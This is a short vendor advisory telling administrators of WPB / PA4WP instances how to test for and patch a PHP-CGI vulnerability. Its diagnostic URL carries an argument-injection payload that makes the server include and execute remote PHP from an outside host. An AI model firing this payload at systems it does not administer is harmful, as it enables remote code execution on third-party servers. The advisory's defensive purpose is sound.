DiagnosticsAll WPB instances installed into POA environment should be checked for this vulnerability.
To check if a server is vulnerable open the following URL in your browser:
https://domain.tld/init.php?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://llsitebuilder.com/api.gif%20-n/?-d%20allow_url_include%3DOn+-d%20auto_prepend_file%3Dhttp://llsitebuilder.com/api.gif%20-nThe domain.tld should be replaced with URL of your PA4WP centralized instance.
In case the server is vulnerable the page with following content will be displayed:
Your instance is affected. Please apply the fix.If you see an empty browser screen - the server is not affected.
ResolutionUpload the sw-engine-cgi-wrapper.tgz to a server that runs PA4WP centralized instance within POA system. Then execute following commands on behalf of the root user:
# tar xfz sw-engine-cgi-wrapper.tgz
# cd sw-engine-cgi-wrapper
# sh setup.sh
After that check if the server is still vulnerable as already shown above.